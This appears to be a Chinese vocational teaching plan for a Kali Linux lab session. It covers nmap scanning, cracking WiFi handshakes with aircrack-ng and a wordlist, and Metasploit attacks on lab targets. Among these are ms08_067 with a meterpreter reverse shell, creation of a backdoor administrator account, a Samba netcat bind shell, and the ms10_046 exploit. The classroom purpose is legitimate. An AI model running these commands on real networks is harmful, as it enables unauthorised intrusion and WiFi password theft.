《linux服务器配置与管理》教案15-任务十五 KALI操作系统的配置和使用

教案授课章节任务十五：KALI操作系统的配置和使用（4课时）教学目标1.KALI服务器的安全工具使用2.掌握KALI服务器的安全工具使用教学内容1.学习NMAP安全工具2.学习aircrack安全工具破解wifi密码3.学习安全漏洞检测工具攻击windowsXP、windows20034.使用安全漏洞检测工具攻击LINUX、windows7重点难点1.学习NMAP安全工具2.学习aircrack安全工具破解wifi密码3.学习安全漏洞检测工具攻击windowsXP攻击windows20034.使用安全漏洞检测工具攻击LINUX靶机攻击windows7教学方法1．采用“项目引导”、“任务驱动”教学方法，并以实践操作演示进行讲解。2．在课堂上注意讲、学、做相结合，注重“问题引导”学生互动，充分调动学生的积极性，培养学习兴趣、分析问题和解决问题的能力以及自学能力。课前准备教学环境准备：1．“教、学、做”一体化学生机房，教师机需要连接投影仪或者安装同屏教学软件；2．学生一人一机、可将学生每4-6人分为一组；3．机房电脑操作系统安装好VMWareWorkstation14.0、需要CentOS7.4镜像。学生预习要求：1．阅读纸质教材，查阅与本章节相关资料；2．在教学平台上学习教材电子版和课件。教学过程师生活动：一、复习提问1.如何检查服务器的系统基本信息2.如何文件及目录权限、进程管理二、导入新课1.无线网络检测：无线网络不需要受到网线接入的位置限制，操作起来方便快捷，但是其所存在的安全问题也日益突出，已经威胁到无线网络的正常运行。存在的主要安全问题有：无线网络盗用、窃听网络通信、钓鱼攻击无线网络、控制用户的无线AP等。无线网络安全问题的应对措施有：限制无线网络的接入、隐藏SSID、选择合适的安全标准、修改无线路由器的密码、降低无线AP的功率等。2.渗透测试软件检测操作系统安全三、讲授新课1.任务描述：某单位在网络安全检查中，需要使用KALI操作系统，用于网络安全检测及调查取证。系统管理员在使用KALI过程中，需要使用安全漏洞检测工具以及无线安全工具检验密码强度及系统的强壮性。2.决策指导：KaliLinux预装了许多渗透测试软件，包括nmap、Wireshark、JohntheRipper，以及Aircrack-ng等。用户可通过硬盘、liveCD或liveUSB方式来运行。它既有32位和64位的镜像，用于x86指令集。又有基于ARM架构、树莓派和三星的ARMChromebook的镜像。集成超过300个渗透测试软件，给用户提供了大量的安全工具。3.安装配置命令知识要点1.学习NMAP安全工具nmap-sS-p1-65535-vnmap-p80--script=http-enum.nse2.学习aircrack安全工具破解wifi密码airmon-ngstartwlan0airodump-ngwlan0monairodump-ng-c10--bssid00:27:19:4C:3F:6C-w90AB.capwlan0monaireplay-ng-020-a00:27:19:4C:3F:6C-c7C:B2:32:1F:A9:0Ewlan0monairmon-ngstopwlan0monaircrack-ng-a2-b00:27:19:4C:3F:6C-w/usr/share/wordlist/rockyou.txt3F6C.cap3.学习安全漏洞检测工具攻击windowsXP、windows2003Msfconfsolenmap--script=smb-check-vulns--script-args=unsafe=1useexploit/windows/smb/ms08_067_netapisetpayloadwindows/meterpreter/reverse_tcpshowoptionssetRHOST6setLHOST37exploitnetuserhacker123456/addnetlocalgroupadministratorhacker/add4.使用安全漏洞检测工具攻击LINUX、windows7searchsambauseexploit/multi/samba/usermap_scriptShowpayloadsSetpayloadcmd/unix/bind_netcatShowoptionssetRHOST07exploituseexploit/windows/browser/ms10_046_shortcut_icon_dllloader4.任务实施过程一：学习NMAP安全工具5.任务实施过程二：学习aircrack安全工具破解wifi密码6.任务实施过程三：学习安全漏洞检测工具、攻击windowsXP攻击windows20037.任务实施过程四：使用安全漏洞检测工具、攻击LINUX靶机攻击windows78.Nmap常用参数参数说明-sPping扫描，Nmap在扫描端口时，默认都会使用ping扫描-sL简单列表扫描-sn使用PING主机方式-sV监测端口服务版本操作系统信息主机名等-sS半开扫描-sTTCP方式扫描，会在目标主机的日志中记录大批连接请求和错误信息。-sUUDP扫描，UDP扫描是不可靠的-sA这项高级的扫描方法通常用来穿过防火墙的规则集-sF-sN秘密FIN数据包扫描、XmasTree、Null扫描模式-sC脚本扫描-A全面系统检测、启用脚本检测、扫描等-O启用远程操作系统检测，但可能存在误报-V-v-v显示扫描过程，推荐使用-PN扫描之前不使用ping命令-p指定端口，如“1-65535、1433、135、22、80、3389”等-h帮助文档-T4针对TCP端口禁止动态扫描延迟超过10ms设置时间模板-iL读取主机列表，“-iLD:\iplist.txt”-oN-oX-oG将报告写入文件，分别是正常、XML、grepable三种格式-traceroute路由跟踪扫描--script按照脚本分类进行扫描-6开启IPv6扫描9.本小节用到的命令。useexploit/windows/browser/ms10_046_shortcut_icon_dllloadersetpayloadwindows/meterpreter/reverse_tcpsetSRVHOST37setRHOST36setLHOST37四、课堂练习1.开启SSH学习crunch密码工具2.学习aircrack安全工具3.使用NMAP工具4.学习aircrack安全工具5.破解wifi密码6.学习安全漏洞检测工具7.攻击windowsXP攻击windows20038.攻击LINUX靶机攻击windows7学生活动：观看教师演示、边学边做、思考、讨论、完成任务实践五、课堂小结1．总结本课学习内容2．总结、评价学生小组活动情况二次备课布置作业1.完成课后巩固练习题；2.上交书面作业或者在教学平台上完成电子文档上传；3.观看下一任务的微课或者项目实录视频。板书设计1.学习NMAP安全工具2.学习aircrack安全工具破解wifi密码3.学习安全漏洞检测工具攻击windowsXP、windows20034.使用安全漏洞检测工具攻击LINUX、windows7教后反思通过学生互动活动，有利于学生自主学习与合作交流。一能加深对识别法的认识，有助对教学内容的巩固；二利用这一互动活动，及时反馈信息，有利于教师调整教学策略，优化教学方法，提高教学质量。学生完成教学任务评价表评价指标及评价内容★★★★★★评价方式基本操作20分部署KALI操作系统教师评价开启SSH学习crunch密码工具动手做20